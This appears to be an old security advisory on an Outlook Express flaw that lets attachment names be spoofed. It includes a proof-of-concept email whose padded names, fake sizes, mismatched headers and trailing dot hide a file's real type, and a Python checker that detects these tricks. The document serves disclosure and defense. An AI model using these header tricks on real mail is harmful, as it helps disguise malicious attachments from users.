
Microsoft Outlook Express File Extension Spoofing Vulnerability


Published: 2002-07-26
Updated: 2002-07-26
Severity:
Threat type: Spoofing
Error type: Design error
Exploit mode: Server mode

BUGTRAQ ID:5277

Affected systems
Microsoft Outlook Express 5.0
Microsoft Outlook Express 5.5
   + Microsoft Internet Explorer 5.0.1
   + Microsoft Internet Explorer 5.0.1 for Windows 2000
   + Microsoft Internet Explorer 5.0.1 for Windows 95
   + Microsoft Internet Explorer 5.0.1 for Windows 98
   + Microsoft Internet Explorer 5.0.1 for Windows NT 4.0
   + Microsoft Internet Explorer 5.5
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows NT 4.0
Microsoft Outlook Express 6.0
Detailed description
Outlook Express contains a vulnerability: by manipulating MIME headers, a malicious user can send an e-mail whose attachment carries a forged file extension and trick Outlook Express into handling it accordingly, for example presenting an .exe extension as the less dangerous .txt extension.

By inserting certain characters between the file name and its real extension, Outlook Express can be made to display whatever file extension the sender chooses.

Test code
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
Subject: E-mail
Date: Fri, 19 Jul 2002 23:37:23 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_007F_01C22F7D.412A3DA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

This is a multi-part message in MIME format.

------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit


This is a sample .EML exploiting several security issues
in Outlook Express 6.0.

1) Note the file attachment name overflow in the attachment list.
If a user specifies a VERY LONG attachment name, the attachment is
truncated in the "Attachments:" listbox.

NOTE: The number of spaces may require some precision work, so
test often until you get the right number! :-)

2) Note how a .CHM file bypassed the malicious application filter.
Normally, a user would not be allowed to open such a file, and the
file would be disabled by the MUA.  However, by using a mismatched
Content-Type/Content-Disposition pair, the filter allows access to
the potentially dangerous CHM file type.

3) Note how the "Open Attachment Warning" dialog displays the filename
when opening the file.  The incredibly long ending that we used to
spoof the attachments list is not even displayed; worse, the file name
could inaccurately be displayed as non-malicious (e.g., ASX as here).

4) Note how a specially crafted attachment name allows us to not only
spoof the name in the listbox, but also the size.  As the user does
not see the size of the attachment, we can fix this member to a false
value.  A typical use for this would be to make the file appear smaller
(safer?) than it really is.

5) Note how the icon is the typical default icon if a "." character is
appended to the end of the filename.  OE doesn't parse past the extra
dot, although Windows does.


------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: application/octet-stream;
    name="NewTitle.asx (132 KB)                                                                                                                                                                                                                                              "
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
    filename="NewTitle.asx (132 KB)                                                                                                                                                                                                                                              "

This is not a real CHM file, just for the sake of demonstration!
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
    name="ATT00119.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
    filename="ATT00119.txt"


------=_NextPart_000_007F_01C22F7D.412A3DA0--

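A defender-side check for the attachment-name tricks the test message above demonstrates, added here as an example and not code from the advisory or from Murphy. It reads attachment names from the raw header text rather than via get_filename(), which strips whitespace and would hide the padding, and it treats a disagreement between the Content-Type name and the Content-Disposition filename as the "mismatched pair" of item 2 (an interpretation); the sample message, its file names and the padding threshold are constructed for this example.

```python
import email
import re

# Constructed sample modelled on the advisory's test message (not the original
# .EML): a padded name carrying a fake "(132 KB)" size, a Content-Type name that
# disagrees with the Content-Disposition filename plus a trailing dot, and a
# name with filler between the shown extension and the real one.
PAD = " " * 120
SAMPLE_EML = "\r\n".join([
    'Content-Type: multipart/mixed; boundary="bnd"', "", "--bnd",
    f'Content-Type: application/octet-stream; name="NewTitle.asx (132 KB){PAD}"',
    f'Content-Disposition: attachment;\r\n    filename="NewTitle.asx (132 KB){PAD}"',
    "", "not a real file", "--bnd",
    'Content-Type: text/plain; name="notes.txt"',
    'Content-Disposition: attachment; filename="notes.chm."', "", "not a CHM", "--bnd",
    'Content-Type: application/octet-stream; name="report.txt' + " " * 40 + '.exe"',
    "", "not an EXE", "--bnd--", "",
])

def raw_param(header, name):
    """Raw parameter value; Message.get_filename() would strip the padding we look for."""
    if header is None:
        return None
    m = re.search(r'(?i)(?<![\w-])%s\s*=\s*(?:"([^"]*)"|([^;\s]*))' % name, str(header))
    return None if m is None else (m.group(1) if m.group(1) is not None else m.group(2))

def audit_attachments(raw_eml, pad_threshold=8):
    """Return [(displayed_name, [findings])] for each MIME part that names a file."""
    results = []
    for part in email.message_from_string(raw_eml).walk():
        ct_name = raw_param(part.get("Content-Type"), "name")
        cd_name = raw_param(part.get("Content-Disposition"), "filename")
        shown = cd_name if cd_name is not None else ct_name
        if shown is None:
            continue
        clean = shown.rstrip()
        findings = []
        if len(shown) - len(clean) >= pad_threshold:
            findings.append("padded-name")          # pushes the real tail out of the listbox
        if re.search(r"\(\s*\d+(?:\.\d+)?\s*[KMG]?B\s*\)", clean, re.I):
            findings.append("fake-size-in-name")    # mimics OE's "name (size)" display
        if clean.endswith("."):
            findings.append("trailing-dot")         # OE stops at the extra dot, Windows does not
        exts = {e.lower() for e in re.findall(r"\.([A-Za-z][A-Za-z0-9]{0,4})(?=[\s.]|$)", clean)}
        if len(exts) > 1:
            findings.append("multiple-extensions")  # shown extension differs from the real one
        if ct_name is not None and cd_name is not None and ct_name.rstrip() != cd_name.rstrip():
            findings.append("name-filename-mismatch")  # the mismatched header pair of item 2
        results.append((clean, findings))
    return results
```

Run audit_attachments over each inbound message at the gateway and quarantine anything with findings, or just log them so the spoofed names show up in review.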
Solution


Related information
Matthew Murphy <mattmurphy@kc.rr.com>.
Reference: http://online.securityfocus.com/bid/527